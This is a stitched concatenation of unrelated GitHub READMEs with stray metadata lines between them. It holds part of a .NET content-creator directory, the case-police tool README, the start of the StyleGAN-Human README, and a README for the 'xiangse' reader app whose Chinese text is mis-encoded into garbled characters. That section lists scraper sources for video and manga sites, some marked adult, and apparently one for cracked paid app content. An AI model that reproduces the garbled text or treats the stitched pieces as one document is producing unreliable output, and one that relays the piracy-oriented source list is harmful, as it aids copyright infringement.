| Jamie Taylor | [Podcast](https://dotnetcore.show), [Twitter](https://twitter.com/dotnetcoreshow/), [YouTube](https://www.youtube.com/c/JamieTaylorDotNetCore/videos) | Podcast, .NET |
| Jasper Kent | [YouTube](https://www.youtube.com/@CodingTutorialsAreGo), [Twitter](https://twitter.com/LastOprichnik), [LinkedIn](https://www.linkedin.com/in/jasper-kent-48a976104/) | .NET, C# |
| John Reilly | [Blog](https://blog.johnnyreilly.com), [Twitter](https://twitter.com/johnny_reilly), [Mastodon](https://fosstodon.org/@johnny_reilly) | .NET |
| Jon Hilton | [Blog](https://jonhilton.net/), [Courses](https://practicaldotnet.io), [Twitter](https://twitter.com/jonhilt) | Blazor, .NET |
| Jon P Smith | [Blog](https://www.thereformedprogrammer.net), [Twitter](https://twitter.com/thereformedprog) | ASP.NET Core, EF Core |
| Jon Skeet | [Blog](https://codeblog.jonskeet.uk/), [Twitter](https://twitter.com/jonskeet), [Book](https://csharpindepth.com/), [StackOverflow](https://stackoverflow.com/users/22656/jon-skeet) | .NET, C# |

### United Kingdom (K-Z) <img src="4x3/gb.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Carl Sargunar | [Github](https://github.com/CarlSargunar), [Twitch](https://www.twitch.tv/carlcod_es), [Twitter](https://twitter.com/carlcod_es), [LinkedIn](https://www.linkedin.com/in/carl-sargunar-63b5814/), [Site](https://carlcod.es/) | .NET, C#, Docker, Umbraco, Maui |
| Layla Porter | [Twitch](https://www.twitch.tv/laylacodesit), [Twitter](https://twitter.com/LaylaCodesIt), [LinkedIn](https://www.linkedin.com/in/layla-porter), [Site](https://www.layla.dev/) | .NET, C# |
| Luke Malpass | [YouTube](https://youtube.com/c/angelsix), [GitHub](https://github.com/angelsix), [Twitter](https://twitter.com/angelsixuk) | .NET, C#, Avalonia UI, WPF |
| Mark Heath | [Pluralsight](https://app.pluralsight.com/profile/author/mark-heath), [Blog](https://markheath.net), [Twitter](https://twitter.com/mark_heath) | .NET, ASP.NET Core, Azure |
| Mark Oliver | [Twitter](https://twitter.com/MicbOliver), [Blog](https://blog.markoliver.website/), [Blog RSS](https://blog.markoliver.website/rss.xml), [LinkedIn](https://www.linkedin.com/in/profileformarkoliver/) | C#, .NET |
| Micheal Colhoun | [Blog](https://colhountech.com/blog/), [Twitter](https://twitter.com/colhountech), [YouTube](https://www.youtube.com/channel/UC-mHR47cULEfJHvk49t1zQA/videos) | .NET, C#, Azure |
| Mike Brind | [Twitter](https://twitter.com/mikesdotnetting), [Blog](https://www.mikesdotnetting.com/), [LinkedIn](https://www.linkedin.com/in/mike-brind/) | C#, .NET |
| Mike Irving | [Blog](https://www.mike-irving.co.uk), [GitHub](https://github.com/mikeirvingweb), [Twitter](https://twitter.com/mikeirvingweb) | .NET, C#, Mobile |
| Mohamad Lawand | [YouTube](https://www.youtube.com/c/MohamadLawand), [Blog](https://dev.to/moe23), [Twitter](https://twitter.com/Moe23) | ASP.NET Core, .NET |
| Nick Chapsas | [YouTube](https://www.youtube.com/c/Elfocrash), [Site](https://nickchapsas.com/), [Twitter](https://twitter.com/nickchapsas), [GitHub](https://github.com/Elfocrash) | .NET, C# |
| Paul Michaels | [Twitter](https://twitter.com/paul_michaels), [Blog](https://pmichaels.net/) | .NET, C#, Architecture |
| Peter Foot | [Blog](https://inthehand.com/blog), [GitHub](https://github.com/peterfoot), [Twitter](https://twitter.com/peterfoot) | .NET, C#, Mobile |
| Peter Morris | [Site](https://blazor-university.com), [Twitter](https://twitter.com/MrPeterLMorris), [GitHub](https://github.com/mrpmorris/) | Blazor |
| Poornima Nayar | [Blog](https://poornimanayar.co.uk/), [Twitter](https://twitter.com/PoornimaNayar), [GitHub](https://github.com/poornimanayar) | .NET, C# |
| Scott Wlaschin | [Site](https://fsharpforfunandprofit.com), [Twitter](https://twitter.com/ScottWlaschin) | F# |
| Steve Gordon | [Pluralsight](https://app.pluralsight.com/profile/author/steve-gordon), [Twitter](https://twitter.com/stevejgordon), [Blog](https://www.stevejgordon.co.uk/), [Mastodon](https://fosstodon.org/@stevejgordon) | .NET, C# |
| Stuart Blackler | [YouTube](https://www.youtube.com/c/CodeWithStu/videos), [LinkedIn](https://www.linkedin.com/in/im5tu/), [Blog](https://im5tu.io/article/), [Twitter](https://twitter.com/CodeWithStu) | .NET, C# |

### USA (A-F) <img src="4x3/us.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Adnan Rafiq | [Blog](https://adnanrafiq.com/blog/), [Mastodon](https://hachyderm.io/@adnanrafiq) | .NET, C#, SQL |
| Brendan Enrick | [YouTube](https://www.youtube.com/c/DevChatter/), [Blog](https://brendoneus.com/), [Twitch](https://www.twitch.tv/DevChatter), [Twitter](https://twitter.com/brendoneus) | .NET, C#, ASP.NET Core |
| Bryan Hogan | [Podcast](https://nodogmapodcast.bryanhogan.net/), [Blog](https://nodogmablog.bryanhogan.net/), [Twitter](https://twitter.com/bryanjhogan), [LinkedIn](https://www.linkedin.com/in/bryanjhogan/) | .NET, Podcast |
| Chris Patterson | [YouTube](https://www.youtube.com/c/PhatBoyG), [Twitter](https://twitter.com/PhatBoyG), [LinkedIn](https://www.linkedin.com/in/chrispatterson/) | MassTransit |
| Chris Woodruff | [Blog](https://woodruff.dev/), [LinkedIn](https://www.linkedin.com/in/chriswoodruff/), [Twitter](https://twitter.com/cwoodruff), [Mastodon](https://mastodon.social/@cwoodruff) | .NET, C#, Web APIs, EFCore, MSSQL |
| Carl Franklin | [Podcast](https://www.dotnetrocks.com/), [BlazorTrain YouTube](https://www.youtube.com/playlist?list=PL8h4jt35t1wjvwFnvcB2LlYL4jLRzRmoz), [Twitter](https://twitter.com/carlfranklin) | Blazor |
| Caleb Wells | [Twitter](https://twitter.com/calebwellscodes), [Podcast](https://topenddevs.com/podcasts/adventures-in-net) | .NET, C# |
| David McCarter | [Blog](https://dotnettips.wordpress.com/), [Live Show](https://www.c-sharpcorner.com/live/rockin-the-code-world-with-dotnetdave), [Twitter](https://twitter.com/realDotNetDave) | .NET, C# |
| David Pine | [Blog](https://davidpine.net/blog), [Twitter](https://twitter.com/davidpine7), [Mastodon](https://fosstodon.org/@davidpine@dotnet.social), [Learning Blazor (Book)](https://bit.ly/learning-blazor) | Blazor |
| Eric Sink | [Twitter](https://twitter.com/eric_sink), [Blog](https://ericsink.com/) | .NET, C# |
| Frank A. Krueger | [Twitter](https://twitter.com/praeclarum), [Podcast (Merge Conflict)](https://www.mergeconflict.fm/), [Blog](https://praeclarum.org/) | .NET MAUI, .NET, Podcast |

### USA (G-L) <img src="4x3/us.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Hassan Rezk Habib | [Blog](https://hassanhabib.com/blog/), [Twitter](https://twitter.com/HassanRezkHabib), [LinkedIn](https://www.linkedin.com/in/hassanrezkhabib/recent-activity/shares/), [linktree](https://linktr.ee/hassanrezkhabib) | .NET |
| John Savill | [YouTube](https://www.youtube.com/c/NTFAQGuy), [Twitter](https://twitter.com/NTFAQGuy), [LinkedIn](https://www.linkedin.com/in/john-savill/) | Azure |
| James Montemagno | [YouTube](https://www.youtube.com/c/JamesMontemagno), [Twitter](https://twitter.com/jamesmontemagno), [LinkedIn](https://linkedin.com/in/jamesmontemagno), [Blog](https://montemagno.com), [Podcast](https://www.mergeconflict.fm/) | .NET MAUI, .NET, Podcast |
| Jeffrey T. Fritz | [YouTube](https://www.youtube.com/c/csharpfritz/), [Twitch](https://www.twitch.tv/csharpfritz), [linktree](https://linktr.ee/csharpfritz) | .NET, ASP.NET Core |
| Jeremy Sinclair | [Blog](https://sinclairinat0r.com/), [Twitter](https://twitter.com/sinclairinat0r), [LinkedIn](https://www.linkedin.com/in/jeremy-sinclair-39b6256/) | .NET, C# |
| Jesse Liberty | [Blog](https://jesseliberty.com/), [Blog RSS](http://feeds.feedburner.com/JesseLiberty), [Mastodon](https://hachyderm.io/@jesseliberty), [Podcast](https://jesseliberty.com/podcast), [Other](https://jesseliberty.com/find-me) | .NET, C#, .NET MAUI, git |
| Jimmy Bogard | [Blog](https://jimmybogard.com/), [LinkedIn](https://www.linkedin.com/in/jimmybogard/), [Twitter](https://twitter.com/jbogard) | AutoMapper, .NET |
| Julie Lerman | [Twitter](https://twitter.com/julielerman) | EF Core, .NET |
| Kendra Havens | [Twitter](https://twitter.com/gotheap) | .NET |
| Kevin Bost | [YouTube](https://www.youtube.com/c/KevinBost), [Twitter](https://twitter.com/kitokeboo) | WPF, .NET |
| Khalid Abuhakmeh | [Blog](https://khalidabuhakmeh.com/), [Twitter](https://twitter.com/buhakmeh), [Mastodon](https://fosstodon.org/@khalidabuhakmeh@mastodon.social) | .NET, C# |
| Lee Richardson | [Blog](http://www.leerichardson.com/), [Twitter](https://twitter.com/lprichar), [LinkedIn](https://www.linkedin.com/in/leerichardson/), [YouTube](https://www.youtube.com/@LeeRichardson200/) | .NET, C#, .NET MAUI |

### USA (M-Z) <img src="4x3/us.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Maclain Wiltzer (Mak) and Yasmin Rodriguez | [Blog](https://makolyte.com/), [Twitter](https://twitter.com/makolyte), [LinkedIn Page](https://www.linkedin.com/company/makolyte/) | .NET, C#, ASP.NET Core |
| Matt Eland | [Blog](https://NewDevsGuide.com/) (Coding), [Blog](https://AccessibleAI.dev/) (AI/ML), [YouTube](https://MattOnDataScience.com), [Twitter](https://twitter.com/IntegerMan) | .NET, C#, ML.NET |
| Michael Eaton | [Blog](https://samestuffdifferentday.net/), [Mastodon](https://fosstodon.org/@mjeaton@our.devchatter.com), [GitHub](https://github.com/mjeaton), [LinkedIn](https://www.linkedin.com/in/mjeaton/) | .NET, C# |
| Niels Swimberghe | [Blog](https://swimburger.net), [Twitter](https://twitter.com/RealSwimburger), [LinkedIn](https://www.linkedin.com/in/nielsswimberghe/) | .NET |
| Richard Campbell | [Podcast Site](https://www.dotnetrocks.com), [Podcast on Bullhorn.fm](https://www.bullhorn.fm/dotnetrocks) | .NET |
[Twitter](https://twitter.com/rickstrahl) | .NET, C#, Markdown | | Rockford Lhotka | [Blog](https://blog.lhotka.net), [Mastodon](https://fosstodon.org/@rockylhotka), [Twitter](https://www.twitter.com/rockylhotka) | .NET | | Saar Shen | [Site](https://www.codewithsaar.net/), [YouTube](https://youtube.com/c/CodewithSaar), [Twitter](https://twitter.com/SaarShen), [Twitter](https://twitter.com/CodeWithSaar) | .NET, C# | | Scott Hanselman | [YouTube](https://www.youtube.com/channel/UCL-fHOdarou-CR2XUmK48Og), [Podcast](https://www.hanselminutes.com/), [Mastodon](https://hachyderm.io/@shanselman) | .NET | | Sean Killeen | [Blog](https://seankilleen.com/), [Twitter](https://twitter.com/sjkilleen), [Mastodon](https://mastodon.social/@sjkilleen), [YouTube](https://www.youtube.com/SeanKilleen), [LinkedIn](https://linkedin.com/in/SeanKilleen) | .NET, C#, Automated Testing, Azure, Terraform | | Shawn Clabough | [Twitter](https://twitter.com/DotNetSuperhero), [Podcast](https://topenddevs.com/podcasts/adventures-in-net) | .NET, C# | | Shawn Wildermuth | [Blog](https://wildermuth.com/), [Pluralsight](https://app.pluralsight.com/profile/author/shawn-wildermuth), [Twitter](https://twitter.com/shawnwildermuth), [LinkedIn](https://www.linkedin.com/in/shawnwildermuth/), [YouTube](https://www.youtube.com/c/swildermuth) | .NET, ASP.NET Core | | SingletonSean | [YouTube](https://www.youtube.com/c/SingletonSean), [Blog](https://seandodson.com/) | WPF, .NET, C# | | Steve Ardalis Smith | [Blog](https://ardalis.com/blog), [Twitter](https://twitter.com/ardalis), [LinkedIn](https://www.linkedin.com/in/stevenandrewsmith/), [Mastodon](https://fosstodon.org/@ardalis) | Domain-Driven Design, Clean Architecture, .NET | | Tim Corey | [YouTube](https://youtube.com/user/IAmTimCorey), [Podcast](https://iamtimcorey.com/p/podcast), [Blog](https://blog.iamtimcorey.com/), [Twitter](https://twitter.com/IAmTimCorey) | .NET, C#, ASP.NET Core | | Travis Illig | [Blog](https://www.paraesthesia.com/), [Twitter](https://twitter.com/tillig), [LinkedIn](https://www.linkedin.com/in/tillig/), [GitHub](https://github.com/tillig) | .NET, C# | | Wes Doyle | [YouTube](https://youtube.com/c/WesDoyle), [LinkedIn](https://www.linkedin.com/in/wes-doyle/) | .NET, AWS | ### 👔 Official MSFT / .NET Foundation Content Resources / Xamarin | Name | Channels | Tags | | --- | --- | --- | | .NET Microsoft Channels | [Blog](https://devblogs.microsoft.com/dotnet), [YouTube](https://www.youtube.com/c/dotNET), [Documentation](https://docs.microsoft.com/dotnet), [Twitter](https://twitter.com/dotnet) | .NET, C#, ASP.NET Core, .NET MAUI | | .NET Foundation | [YouTube](https://www.youtube.com/c/NETFoundation), [Twitter](https://twitter.com/dotnetfdn) | .NET | | Microsoft Visual Studio | [YouTube](https://www.youtube.com/c/visualstudio), [Blog](https://devblogs.microsoft.com/visualstudio/) | .NET, Visual Studio | | Xamarin Developers | [YouTube](https://www.youtube.com/c/XamarinDevelopers) | .NET, Xamarin | ### 🤹 Multi-Creator Channels, Creator Name Unknown | Name | Channels | Tags | | --- | --- | --- | | 6 Figure Developer Podcast | [Podcast](https://6figuredev.com/category/podcast/) | Podcast, .NET | | Adventures in .NET | [Podcast](https://topenddevs.com/podcasts/adventures-in-net) | .NET | | Code Maze | [Blog](https://www.code-maze.com) | .NET, C#, ASP.NET Core | | Coding After Work | [Podcast](https://www.codingafterwork.com/), [Twitch](https://www.twitch.tv/codingafterwork), [Twitter](https://twitter.com/CodingAfterWork) | .NET, Blazor, Podcast | | Coding Blocks |
[Podcast](https://www.codingblocks.net/) | .NET, Podcast | | Curious Drive | [YouTube](https://www.youtube.com/c/CuriousDrive) | .NET, Blazor, ASP.NET Core | | C# Corner | [Blog](https://www.c-sharpcorner.com/) | .NET, C# | | DevMentors | [YouTube](https://www.youtube.com/c/DevMentors), [Site](https://devmentors.io) | .NET | | Dotnetos | [Blog](https://dotnetos.org/blog), [YouTube](https://youtube.com/c/Dotnetos) | .NET, C# | | DotNet Core Central | [YouTube](https://www.youtube.com/c/DotNetCoreCentral) | .NET | | ExceptionNotFound | [Blog](https://www.exceptionnotfound.net) | .NET | | GoatReview | [Blog](https://goatreview.com/) | .NET, Akka.NET, Architecture | | tutorials.EU | [YouTube](https://www.youtube.com/c/tutorialsEU), [Courses](https://tutorials.eu/) | .NET | | Kudvenkat/Pragim | [YouTube](https://www.youtube.com/c/Csharp-video-tutorialsBlogspot) | .NET, ASP.NET Core | ### 🐙 Aggregator Sites | Name | Channels | Tags | | --- | --- | --- | | Discover.NET | [Site](https://discoverdot.net) | .NET, Aggregator Site | | .NET Ketchup | [Site](https://dotnetketchup.com) | .NET, Aggregator Site | | The Morning Brew by Chris Alcock, UK | [Site](https://blog.cwa.me.uk/) | .NET, Aggregator Site | | The Morning Dew by Alvin Ashcraft, USA | [Site](https://www.alvinashcraft.com/) | .NET, Aggregator Site | ## 🙏 Credits * Special thanks to [Shreyas Jejurkar](https://twitter.com/ShreyasJejurkar) for sharing a lot of awesome YouTube channels that I didn't know: [List of YouTube channels for .NET C# developers](https://shreyasjejurkar.com/2022/01/24/list-of-youtube-channels-for-net-csharp-developers/) * Special thanks to the [dotnet Twitter Community](https://twitter.com/i/communities/1488624124817666051) for suggesting creators * Flags copied from: [Free Country Flags in SVG](https://flagicons.lipis.dev) * Thanks to all contributors! ## 🔗 Other Project Links * [Twitter List to follow](https://twitter.com/i/lists/1567240908059430912) * URL to this repository: [github.com/matthiasjost/dotnet-content-creators](https://github.com/matthiasjost/dotnet-content-creators) * Alternative link with redirection: [content-creators.net](https://www.content-creators.net) * OPML file with all RSS feeds: [dotnet-creators-opml](https://github.com/matthiasjost/dotnet-creators-opml) * This list is maintained by [Matthias Jost](https://matthiasjost.bio.link)
โšกA list of .NET content creators
dotnet,dotnet-core,dotnet-framework
0
70
102
551
0
1
1
xiaohucode/xiangse
# ้ฆ™่‰ฒ้—บ้˜็›Š่พพๆบ # QQ้ข‘้“ ๅŠ ๅ…ฅQQ้ข‘้“[ใ€้ฆ™่‰ฒ้—บ้˜ใ€‘](https://qun.qq.com/qqweb/qunpro/share?_wv=3&_wwv=128&inviteCode=1tx5fU&from=181074&biz=ka) ![](/img/imgqun.png) # ้ฆ™่‰ฒAPPๅ†…ๅฏผๅ…ฅ็ฝ‘ๅ€ ``` https://raw.githubusercontent.com/xiaohucode/xiangse/main/README.md ``` ![](/img/dao.PNG) # ๅ›ฝๅ†…ๅŠ ้€Ÿ ``` https://gcore.jsdelivr.net/gh/xiaohucode/xiangse@main/README-CN.md ``` # ่ง†้ข‘ๆบ ``` ๆณฅ่ง†้ข‘(ไผ˜่ดจๆบ)ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง ่งฃๆžๅฟซ-้œ€่ฆๅผ€้ญ”ๆณ• https://github.com/xiaohucode/xiangse/raw/main/TV/nitv-1.xbs ๆณฅ่ง†้ข‘-ๅˆๅคœ็‰ˆ(ไผ˜่ดจๆบ)ๆˆไบบ็‰ˆ,่งฃๆžๅฟซ-้œ€่ฆๅผ€้ญ”ๆณ• https://github.com/xiaohucode/xiangse/raw/main/TV/nitv-2.xbs myselfๅŠจๆผซ(ไผ˜่ดจๆบ)่ถ…ๆธ…ๅŠจๆผซ่ต„ๆบ https://github.com/xiaohucode/xiangse/raw/main/TV/myself.xbs 97kp(ไผ˜่ดจๆบ)ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง ่งฃๆžๅฟซ-่ต„ๆบไธ€่ˆฌ https://github.com/xiaohucode/xiangse/raw/main/TV/97kp.xbs freeok(ไผ˜่ดจๆบ)ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง ่งฃๆžๅฟซ-่ต„ๆบๅ…จ https://github.com/xiaohucode/xiangse/raw/main/TV/freeok.xbs 555็”ตๅฝฑ(ไผ˜่ดจๆบ)ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง-Netflix่“ๅ…‰,็ฆๅˆฉ https://github.com/xiaohucode/xiangse/raw/main/TV/555dy.xbs ้ฅญๅ›ขๅฝฑ่ง†(ไผ˜่ดจๆบ) ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰งๅŠจๆผซ็ปผ่‰บ https://github.com/xiaohucode/xiangse/raw/main/TV/fantuan.xbs ๆ˜Ÿ็ฉบๅฝฑ่ง†(ไผ˜่ดจๆบ) ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง-่ต„ๆบๅ…จ https://github.com/xiaohucode/xiangse/raw/main/TV/xkys.xbs zzzfun็•ชๅ‰ง(ไผ˜่ดจๆบ)APPๆบ https://github.com/xiaohucode/xiangse/raw/main/TV/zzzfun.xbs ๅคงๅธˆๅ…„ๅฝฑ่ง†(ไผ˜่ดจๆบ) ๅŒ…ๅซๅ›ฝๅ†…ๅค–ๅฝฑ่ง†ๅ‰ง-่ต„ๆบๅ…จ https://github.com/xiaohucode/xiangse/raw/main/TV/dsxys.xbs ๅŽ‚้•ฟ่ต„ๆบ https://github.com/xiaohucode/xiangse/raw/main/TV/czzy.xbs ๅคง็ฑณๆ˜Ÿ็ƒ(ไผ˜่ดจๆบ) https://github.com/xiaohucode/xiangse/raw/main/TV/dmxq.xbs ๅŠจๆผซๅทดๅฃซ https://github.com/xiaohucode/xiangse/raw/main/TV/dmbs.xbs 6ๅŠจๆผซ(ไผ˜่ดจๆบ) https://github.com/xiaohucode/xiangse/raw/main/TV/6dm.xbs ๆจฑ่ŠฑๅŠจๆผซ https://github.com/xiaohucode/xiangse/raw/main/TV/yhdm.xbs ็‹ฌๆ’ญๅบ“(ไผ˜่ดจๆบ)่ต„ๆบๆ›ดๆ–ฐๅฟซ,้œ€่ฆ(่ชๆ•ฉไปฉ่›ง) https://github.com/xiaohucode/xiangse/raw/main/TV/duboku.xbs AnFunsๅŠจๆผซ(ไผ˜่ดจๆบ)่“ๅ…‰ๆ— ไฟฎ็•ชๅ‰ง(ๆžๅ“)้žๅคง้™†IPไผš่งฆๅ‘CF https://github.com/xiaohucode/xiangse/raw/main/TV/AnFuns.xbs ่Š’ๆžœTV(ไผ˜) https://github.com/xiaohucode/xiangse/raw/main/TV/mgtv.xbs ๅคฉ็ฉบๅฝฑ่ง† ่งฃๆžไธ€่ˆฌ,ๅฎนๆ˜“ๅคฑๆ•ˆ https://github.com/xiaohucode/xiangse/raw/main/TV/tkys.xbs ๅฟซ็ŒซAPP๐Ÿ”ž (appๆบ) ๆŠ“็š„APPๆ•ฐๆฎ,็ ด่งฃ้‡‘ๅธ่ง†้ข‘ https://github.com/xiaohucode/xiangse/raw/main/TV/kuaimao.xbs 18av๐Ÿ”ž ไธญๆ–‡ๅญ—ๅน•HๅŠจๆผซ.ๆ›ดๆ–ฐๆ’ญๆ”พๅฟซ(่ชๆ•ฉไปฉ่›ง) https://github.com/xiaohucode/xiangse/raw/main/TV/18av.xbs hanimeๅŠจๆผซ๐Ÿ”ž HๅŠจๆผซ;ๆ‡‚ๅพ—้ƒฝๆ‡‚(่ชๆ•ฉไปฉ่›ง) https://github.com/xiaohucode/xiangse/raw/main/TV/hanime.xbs ``` # ๆผซ็”ปๆบ ``` vomicๆผซ็”ป(่šๅˆ) https://github.com/xiaohucode/xiangse/raw/main/manga/vomicmh.xbs ็ฌ”่ถฃๆผซ็”ป https://github.com/xiaohucode/xiangse/raw/main/manga/bqmh.xbs ๅ–ตไธŠๆผซ็”ป https://github.com/xiaohucode/xiangse/raw/main/manga/miaoshang.xbs ๅฅ‡ๆผซๅฑ‹(ไผ˜) ๅ›ฝๆผซๅคš(ๅ‡‰ไบ†) https://github.com/xiaohucode/xiangse/raw/main/manga/qimanwu.xbs ้€Ÿๆผซๅบ“(ไผ˜) ๅ›ฝๆผซๅคš(ๅ‡‰ไบ†) https://github.com/xiaohucode/xiangse/raw/main/manga/sumanku.xbs 6ๆผซ็”ป(ไผ˜) ๅ›ฝๆผซๅคš https://github.com/xiaohucode/xiangse/raw/main/manga/6manhua.xbs ๆผซ็ฅž(ไผ˜) ๅ›ฝๆผซ ๆ—ฅๆผซ ่ต„ๆบๅคš https://github.com/xiaohucode/xiangse/raw/main/manga/manshen.xbs ๆผซ็”ปๅง(ไผ˜) ๅ›ฝๆผซ ๆ—ฅๆผซ ่ต„ๆบๅคš https://github.com/xiaohucode/xiangse/raw/main/manga/mhba.xbs ๅฅฝๆผซ6 
https://github.com/xiaohucode/xiangse/raw/main/manga/haoman6.xbs ๅฅฝๆผซ8 https://github.com/xiaohucode/xiangse/raw/main/manga/haoman8.xbs ็ฌจ็ฌจ็†Šๆผซ็”ป https://github.com/xiaohucode/xiangse/raw/main/manga/bbxcomic.xbs ๅฟ†ๆผซ(ไผ˜) ๐Ÿ‘พ็š„ๆบ,ๅชๅšไบ†ไฟฎๅค https://github.com/xiaohucode/xiangse/raw/main/manga/ym.xbs ๆœจ็“œๆผซ็”ป(ไผ˜) ๐Ÿ”ž้Ÿฉๆผซ ๆ—ฅๆผซ ๅ›ฝไบง3D(ๅ‡‰ไบ†) https://github.com/xiaohucode/xiangse/raw/main/manga/mugua.xbs ไบฒไบฒๆผซ็”ป ๅ›ฝๆผซ่ต„ๆบไธ€่ˆฌ,ไธป่ฆ๐Ÿ”žๆ—ฅๆผซ้Ÿฉๆผซ https://github.com/xiaohucode/xiangse/raw/main/manga/qinhm.xbs ``` # ๅฐ่ฏดๆบ ``` ็ˆฑ้˜…ๅฐ่ฏดapp(ไผ˜) https://github.com/xiaohucode/xiangse/raw/main/novel/aiyueks.xbs ็œ‹ไนฆๅŠฉๆ‰‹(่šๅˆ) ่šๅˆๆœ็ดขๅ…จ็ฝ‘ๅฐ่ฏด https://github.com/xiaohucode/xiangse/raw/main/novel/kszs.xbs ็บข็”˜ๆณ‰ https://github.com/xiaohucode/xiangse/raw/main/novel/hgq.xbs ้ฃž้€Ÿไธญๆ–‡ https://github.com/xiaohucode/xiangse/raw/main/novel/feiszw.xbs 33่จ€ๆƒ… https://github.com/xiaohucode/xiangse/raw/main/novel/33yq.xbs ๅฎŒๆœฌ็ฅž็ซ™ https://github.com/xiaohucode/xiangse/raw/main/novel/wbsz.xbs ่ตท็‚นไธญๆ–‡(ๆญฃ็‰ˆ)่กฅ้ฝไธ‰ๆฑŸๅˆ†็ฑป ้œ€่ฆ็œ‹ๆญฃ็‰ˆๅฏไปฅๅœจไนฆ็ฑๅ†…ๅฎน็•Œ้ข็™ป้™†่ตท็‚น่ดฆๅท https://github.com/xiaohucode/xiangse/raw/main/novel/qidian.xbs ็ฅž่—ๅฐ่ฏด็ฝ‘ https://github.com/xiaohucode/xiangse/raw/main/novel/szxs.xbs 360ๅฐ่ฏด็ฝ‘ ้ฆ–ๆฌกไฝฟ็”จ้œ€่ฆ็™ป้™†,CookieไฟๆŒไธ€ไธชๆœˆ https://github.com/xiaohucode/xiangse/raw/main/novel/360xs.xbs ``` # ๆœ‰ๅฃฐ ``` ๆตทๆด‹ๅฌไนฆ https://github.com/xiaohucode/xiangse/raw/main/audio/hyts.xbs ่€็™ฝๆ•…ไบ‹ (ๆŠ“็š„APP็ซฏ็š„่ต„ๆบ) https://github.com/xiaohucode/xiangse/raw/main/audio/laobaigs.xbs ๆˆ‘ๅฌ่ฏ„ไนฆ็ฝ‘ (่€็™ฝๆ•…ไบ‹็š„่ต„ๆบ) https://github.com/xiaohucode/xiangse/raw/main/audio/wtpsw.xbs ```
้ฆ™่‰ฒ้—บ้˜่ง†้ข‘ๆบ
null
0
3
0
178
2
1
0
antfu/case-police
# ๐Ÿšจ CasePolice [![NPM version](https://img.shields.io/npm/v/case-police?color=a1b858&label=)](https://www.npmjs.com/package/case-police) <!-- @case-police-ignore --> - Git**H**ub, not *Github* - Type**S**cript, not *Typescript* - **m**acOS, not *MacOS* - **VS C**ode, not *Vscode* - [...](./packages/case-police/dict) Make the case correct, PLEASE! ## Usage **Make sure you have committed all unsaved works**, and then ```bash npx case-police --fix ``` It will scan all your source files and fix the cases of [known names](./packages/case-police/dict). Only the word including both uppercase and lowercase will be fixed. (e.g. `Github` -> `GitHub`; `github` and `GITHUB` will be left untouched). ### Use in ESLint We also provide an ESLint plugin that can be used to lint your codebase. ```bash npm i -D eslint-plugin-case-police ``` <!-- eslint-skip --> ```jsonc // .eslintrc { "extends": [ "plugin:case-police/recommended" ] } ``` ### Use in CI Simply add `case-police` (without `--fix`) to your workflow and it will exit with a non-zero code for your CI to catch it. ### Specific files By default it will scan all the text files under the current directory (respects `.gitignore`), if you want it to check only specific files, you can pass the file paths of glob patterns to it. ```bash npx case-police "**/*.md" path/to/file.html ``` ## CLI Options | Options | Description | | --- | --- | | `[...globs]` | Files or glob to be checked, if not provided, all the text files will be check | | `--fix` | Rewrite changes to file | | `-d, --dict <path>` | Custom dictionary JSON, will be merged with original dict | | `-p, --presets <presets>` | Filter the default [presets](./packages/case-police/dict), comma separated | | `--no-default` | Disable the default dictionary | | `--disable <rules>` | Disable rules, comma separated | | `--ignore <globs>` | Files or globs to be ignore, comma separated | ### Ignores You can add `@case-police-disable` in your file to disable the case check for the particular file, or add `@case-police-ignore xxx` to ignore certain words in that file. For example: ```ts // @case-police-ignore Uri console.log(something.Uri.path) ``` ## Sponsors <p align="center"> <a href="https://cdn.jsdelivr.net/gh/antfu/static/sponsors.svg"> <img src='https://cdn.jsdelivr.net/gh/antfu/static/sponsors.svg'/> </a> </p> ## Related Projects [actions-case-police](https://github.com/Namchee/actions-case-police). Use the correct letter case in GitHub issues and pull requests ## License [MIT](./LICENSE) License ยฉ 2021 [Anthony Fu](https://github.com/antfu)
๐Ÿšจ Make the case correct, PLEASE!
null
36
83
147
206
4
1
2
stylegan-human/StyleGAN-Human
# StyleGAN-Human: A Data-Centric Odyssey of Human Generation <img src="./img/demo_V5_thumbnails-min.png" width="96%" height="96%"> <!-- **stylegan-human/StyleGAN-Human** is a โœจ _special_ โœจ repository because its `README.md` (this file) appears on your GitHub profile. --> > > > **Abstract:** *Unconditional human image generation is an important task in vision and graphics, which enables various applications in the creative industry. Existing studies in this field mainly focus on "network engineering" such as designing new components and objective functions. This work takes a data-centric perspective and investigates multiple critical aspects in "data engineering", which we believe would complement the current practice. To facilitate a comprehensive study, we collect and annotate a large-scale human image dataset with over 230K samples capturing diverse poses and textures. Equipped with this large dataset, we rigorously investigate three essential factors in data engineering for StyleGAN-based human generation, namely data size, data distribution, and data alignment. Extensive experiments reveal several valuable observations w.r.t. these aspects: 1) Large-scale data, more than 40K images, are needed to train a high-fidelity unconditional human generation model with vanilla StyleGAN. 2) A balanced training set helps improve the generation quality with rare face poses compared to the long-tailed counterpart, whereas simply balancing the clothing texture distribution does not effectively bring an improvement. 3) Human GAN models with body centers for alignment outperform models trained using face centers or pelvis points as alignment anchors. In addition, a model zoo and human editing applications are demonstrated to facilitate future research in the community.* <br> **Keyword:** Human Image Generation, Data-Centric, StyleGAN [Jianglin Fu](mailto:fujianglin@sensetime.com), [Shikai Li](mailto:lishikai@sensetime.com), [Yuming Jiang](https://yumingj.github.io/), [Kwan-Yee Lin](https://kwanyeelin.github.io/), [Chen Qian](https://scholar.google.com/citations?user=AerkT0YAAAAJ&hl=zh-CN), [Chen Change Loy](https://www.mmlab-ntu.com/person/ccloy/), [Wayne Wu](https://wywu.github.io/), and [Ziwei Liu](https://liuziwei7.github.io/) <br> **[[Demo Video]](https://youtu.be/nIrb9hwsdcI)** | **[[Project Page]](https://stylegan-human.github.io/)** | **[[Paper]](https://arxiv.org/pdf/2204.11823.pdf)** ## Updates - 